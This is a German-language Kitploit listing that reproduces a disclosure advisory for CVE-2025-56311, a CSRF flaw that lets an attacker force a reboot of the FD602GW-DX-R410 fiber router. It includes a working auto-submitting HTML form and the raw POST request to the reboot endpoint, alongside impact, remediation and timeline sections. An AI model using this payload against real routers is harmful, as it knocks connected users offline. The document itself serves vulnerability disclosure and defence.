Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-56311 — Eine CSRF-Schwachstelle im Router FD602GW-DX-R410 ermöglicht es entfernten Angreifern, das Gerät über eine manipulierte POST-Anfrage an /boaform/admin/formReboot neu zu starten, wenn ein Administrator authentifiziert ist. | Kitploit
Tools/GitHubGitHub/wrathfuldiety/cve-2025-56311
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsPapers & ForschungLernen & Bildung
GitHubwrathfuldiety/cve-2025-56311

CVE-2025-56311

Eine CSRF-Schwachstelle im Router FD602GW-DX-R410 ermöglicht es entfernten Angreifern, das Gerät über eine manipulierte POST-Anfrage an /boaform/admin/formReboot neu zu starten, wenn ein Administrator authentifiziert ist.

Repository anzeigen
2vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-56311: Sicherheitshinweis – CSRF-Schwachstelle in der Neustartfunktion des Routers FD602GW-DX-R410

Proof of Concept und Sicherheitshinweis für eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) in der Admin-Oberfläche des Glasfaser-Routers FD602GW-DX-R410 (Firmware V2.2.14). Der Hinweis beschreibt die Auswirkungen, den Angriffsvektor und Empfehlungen zur Behebung.

fd602gw-dx-r410-csrf-advisory

Eine CSRF-Schwachstelle im Router FD602GW-DX-R410 erlaubt es entfernten Angreifern, das Gerät über eine manipulierte POST-Anfrage an /boaform/admin/formReboot neu zu starten, wenn ein Administrator authentifiziert ist.


Überblick

In der webbasierten Admin-Konsole des Glasfaser-Routers FD602GW-DX-R410 (Firmware V2.2.14) wurde eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) entdeckt. Der Endpunkt /boaform/admin/formReboot erlaubt es, per POST-Anfrage einen vollständigen Neustart des Geräts auszulösen, ohne dass CSRF-Tokens oder eine Origin-Validierung erforderlich sind. Wenn ein authentifizierter Administrator eine schädliche Seite besucht, kann der Router ohne Zustimmung remote neu gestartet werden.

  • CVE-ID: CVE-2025-56311
  • Veröffentlichungsdatum des Advisories: Juli 2025
  • Entdeckt von: Hasanka Amarasinghe (Unabhängiger Sicherheitsforscher)
  • Anbieter: Shenzhen C-Data Technology Co., Ltd.
  • Betroffenes Produkt: Glasfaser-Router FD602GW-DX-R410
  • Firmware-Version: V2.2.14 (Build.1918.241111)
  • Hardware-Version: R410.1B
  • Bootloader-Version: V3.7-2312181457
  • Webserver: Boa/0.93.15
  • Zugriffsvektor: Remote (Der authentifizierte Administrator muss angemeldet sein)
  • Schweregrad: Mittel
  • CVSS v3.1 Basisscore: 5.4 (Mittel)

  • Betroffenes Produkt

    • Gerät: Glasfaser-Router FD602GW-DX-R410
    • Firmware: V2.2.14 (Build.1918.241111)
    • Komponente: Neustart-Handler - /boaform/admin/formReboot
    • Webserver: Boa/0.93.15

    Details zur Schwachstelle

    • Typ: Cross-Site Request Forgery (CSRF)
    • Angriffsvektor: Remote (Der Administrator muss in seiner Sitzung angemeldet sein)
    • Authentifizierung: Für den Angreifer nicht erforderlich (Administratorsitzung im Browser des Opfers erforderlich)
    • Auswirkung: Unautorisierter Neustart des Geräts
    • Zustandspersistenz: Zustandslose Sitzung, wahrscheinlich über IP oder interne Sitzungs-Tokens verfolgt

    Proof of Concept (PoC)

    CSRF-Payload (HTML)

    root@kitploit:~
    <html>
      <!-- CSRF PoC - generated by Burp Suite Pro -->
      <body>
        <form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
          <input type="hidden" name="postSecurityFlag" value="+65535" />
          <input type="submit" value="Submit" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

    HTTP-Anfrage

    root@kitploit:~
    POST /boaform/admin/formReboot HTTP/1.1
    Host: 192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 23
    
    postSecurityFlag=+65535
    

    Antwort

    HTTP 200 OK; Der Router startet sofort neu.


    Empfehlungen

    • Implementieren Sie CSRF-Tokens und eine strikte Origin-/Referer-Validierung auf allen Admin-Endpunkten.
    • Machen Sie veraltete oder verwaiste Sitzungen ungültig und binden Sie Sitzungen an sichere Cookies.
    • Erwägen Sie CAPTCHA- oder Bestätigungsabfragen, bevor destruktive Aktionen wie ein Neustart ausgeführt werden.
    • Beschränken Sie den Zugriff auf die Admin-Oberfläche ausschließlich auf vertrauenswürdige IPs oder interne Netzwerke.

    Angriffsvektor

    • Erfordert, dass der Router-Administrator authentifiziert (angemeldet) ist.
    • Ein Angreifer lockt das Opfer auf eine schädliche Webseite, die unbemerkt eine POST-Anfrage an den Neustart-Endpunkt auslöst.
    • Der Router akzeptiert die gefälschte Anfrage und startet sofort neu, was einen Denial of Service verursacht.

    Auswirkungen

    • Denial of Service durch erzwungenen Neustart.
    • Verlust der Netzwerkverfügbarkeit für alle verbundenen Benutzer.
    • Möglichkeit, dies mit anderen Problemen zu kombinieren (z. B. Session-Hijacking oder XSS), um die Auswirkungen zu verstärken.

    Offenlegungszeitplan

    DatumAktion
    Jun 2025Schwachstelle entdeckt
    Jun 2025Verantwortungsvolle Offenlegung versucht (keine Antwort)
    Jul 2025CVE-ID bei MITRE angefordert
    Jul 2025Advisory vorbereitet und Veröffentlichung ausstehend
    Sep 2025CVE zugewiesen, Advisory veröffentlicht

    Referenzen

    • Anbieter: Shenzhen C-Data Technology Co., Ltd.
    • Gerät: FD602GW-DX-R410
    • Firmware: V2.2.14
    • GitHub Advisory: https://github.com/wrathfulDiety/CVE-2025-56311

    Haftungsausschluss

    Dieses Advisory dient Bildungs- und Sicherheitsbewusstseinszwecken. Der Autor übernimmt keine Verantwortung für Missbrauch. Sämtliche Tests wurden in einer kontrollierten Umgebung durchgeführt.

    Tool herunterladen